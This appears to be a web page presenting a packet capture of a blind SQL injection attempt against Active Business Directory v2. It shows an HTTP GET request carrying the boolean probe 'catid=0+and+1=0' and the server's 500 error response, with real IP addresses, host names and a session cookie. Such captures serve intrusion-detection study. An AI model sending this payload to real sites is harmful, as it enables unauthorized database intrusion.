Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1:1421, ack 438, win 65098, length 1420: HTTP: HTTP/1.1 500 Internal Server Error
.. v…!E…JZ@.q.cm.j..u….P .f).tJ…P..J….HTTP/1.1 500 Internal Server Error
Date: Thu, 01 Jan 2009 14:36:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 4951
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD; path=/
Cache-control: private

Active Business Directory

2009-01-01 09:37:00.223959 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1421:2841, ack 438, win 65098, length 1420: HTTP .. v…!E…J[@.q.cl.j..u….P .f*..J…P..J….

Please follow and like us: